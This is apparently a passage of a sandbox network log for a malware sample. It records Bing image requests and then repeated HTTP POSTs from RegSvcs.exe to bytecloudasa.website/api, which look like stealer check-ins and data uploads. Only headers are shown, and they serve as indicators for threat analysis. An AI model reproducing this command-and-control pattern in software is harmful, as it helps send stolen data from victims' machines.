report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DA2D01DBC8174AA583FB250B3201CBF8 Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:35:40Z
date: Wed, 11 Oct 2023 08:35:40 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300927_1MHQY2TQNUIH7ZQRL&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300927_1MHQY2TQNUIH7ZQRL&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 481315
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CD89E4388F6448ED8FE4314D755E8EDC Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:35:40Z
date: Wed, 11 Oct 2023 08:35:40 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301721_1Y64UM4ZK2VT4MVP3&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301721_1Y64UM4ZK2VT4MVP3&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 453614
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D9DC23DA82C7401D96B8D023DB56A3D2 Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:35:40Z
date: Wed, 11 Oct 2023 08:35:40 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 483933
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 68975CB65D81471B979CA47819D91558 Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:35:40Z
date: Wed, 11 Oct 2023 08:35:40 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 393346
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1192407FD374687BA6447C0C4BB66CF Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:35:40Z
date: Wed, 11 Oct 2023 08:35:40 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301360_1Q2LDLW388L48JF4Q&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301360_1Q2LDLW388L48JF4Q&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 455899
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1610DC8C381D4ADB918FADBC8F4AF934 Ref B: BRU30EDGE0821 Ref C: 2023-10-11T08:36:04Z
date: Wed, 11 Oct 2023 08:36:03 GMT
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5o924jft1pap0mtdhqu13g9ad1; expires=Sun, 04 Feb 2024 02:22:19 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:40 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fh4R8A4P7G8dUSU1Lm5f%2FbR6ZHzBDymHf9xoPShgl6mu4wBwZ%2B%2BnHbL9slXPPNntc78VyQHjFZYVeyMoUKFB8Y6C962FHuBeCr8paIIlHEU95jpjUfqB0WijEbxHOotP8ESzNxLDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5620bc36724-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tr37mpml3pvogr7228cauf0k5d; expires=Sun, 04 Feb 2024 02:22:20 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:41 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bIwz8dgkKOvYDkKetfg9aD2PUpSS1BL%2BqdQlHPRZOM2BytMqPcO2Fx6uYpehm4R1W5smkCkfsnLJUvkxFqzm7xp%2FubEzwbyqtmdFxLNn5EPCsutdQ6rjbSTPnE%2BzRQdAXfEpvzXhfA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5643bcbb97e-AMS
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16482
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=636bjiiidt82amj5imqm5e4n58; expires=Sun, 04 Feb 2024 02:22:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YFfr8lyp51e1iQWvOd%2BMcMsqmDXrzzKIAahA0kGjzNeaW8fkJVEg6uVPhAaRqQZtNwt9RYbCbk21zkNRAGzdJdZ6kJDYQzC41Oy8aGg0WgbWXrBc95SBkMKkgSpvDV1DDZEIKCBQ6w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c56e3fed6724-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ti9hs6aoafhj350a8p0db748fl; expires=Sun, 04 Feb 2024 02:22:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BKWYala14RdLnKUHA7ExPBox%2B%2BHi6G08y17GtSGkv9FKOYZ3iVy2IDrORTXJEpZg3nJnoqFhYa8jOlm8lF1Y%2F9t8PTYL3RXaVpi4C6Kis%2BqlFqu5K9614%2BZ4bfd6pa77vO%2ByTFBGXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5767c0f0eb1-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=33buupsp1i4ucqq1miute6mdl8; expires=Sun, 04 Feb 2024 02:22:23 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:44 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sPL5uMC2izJHL8ia7JzKTKk8pD8fxfhjkKjJmxxj9dlSJdh7v3rMkTLGW2%2BcJ%2FsIaTA7FBstOPJ8K2fRROqTSD1STnyJrATkt%2BbyLpcqYDrOTL%2FjZF6LtkDhfKgKORCbkAogGm9ruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c577eae46709-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=t7fpci5uvjgla6466ofc1suta2; expires=Sun, 04 Feb 2024 02:22:23 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:44 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FmXrmxUcKNceUsFWDvyhSCRJu4EWEs%2FImv5lVBDiPGV%2F28MKUW1hAnSo%2FGrKoXLRcsTc0qTdwjxIcCpX5M8vJFIb8ex880Tffwotcx859XHXaRzTJYyq58SVLvdGlwRRwTlqO7eoBw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c57938f6b7c4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5urr091g4h1oo3didokqi4fpv2; expires=Sun, 04 Feb 2024 02:22:23 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:44 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YSXCWw8Wu3o0oyBNlbbA%2BArRyi0%2B8ozRXuOtX2hpQpEri9nJDU5r6MBuJCiG%2FUYqG85QaqjagGNoa4yz2Xl%2BY%2Fs1OVvsSPebrgoWmX9IfmzRwdRAPzxQyTdbo%2F9tj1wYO1Q23PYCOw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c57a893fb8c4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9a4tm4d7j6tvh96tcddfnp6n84; expires=Sun, 04 Feb 2024 02:22:23 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:44 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kA4915dY2NQBuc%2FBx1rJWA7z9kKJPf8Flxj3ZsS4wJ%2BfCzoiShVhEDx9jkkzCOaYwq3tLpjMWyPpXY5KbHlRR5EOCGP0hTLNPCR1iYooSw7X1dOQVyafy0mzzXuNpaGcEYhVDOys8g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c57bbbd866c2-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17428
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=slqsqe71jcrk3c05t03qr40fnk; expires=Sun, 04 Feb 2024 02:22:38 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:59 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mZouYbizAaKpQpF8n0GaAScnsnMTr8%2BXPmqr%2FH%2FwawT1krPoaRraNYigU%2Fvrosbun%2FDA01RrSlmKwrIaFdU7sX6SYQzNS9MQlW2rCb6nVzMw8%2FT1IJG%2Fz3hdXPm4lTakUtBbbG5r9w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5d26ee006ba-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hp9q7pkddj88q9gitap8rnnruj; expires=Sun, 04 Feb 2024 02:22:41 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:02 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BmKYNvDC6b3OOA67TeClndXt%2BLu4ctawMrQmPYbkzgweBdIJaSlyFJMMWHgmsieK0lGA%2BKcqzDQjXpw3%2BT13y44LEfkCbpxfXMfxcrz%2B9JefphkO%2F9Z8cmPcm6eCKX%2FB5FSCKs3a7g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5ed48d3667f-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=7hfel6krsrgi4q3bb6q6liiqji; expires=Sun, 04 Feb 2024 02:22:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
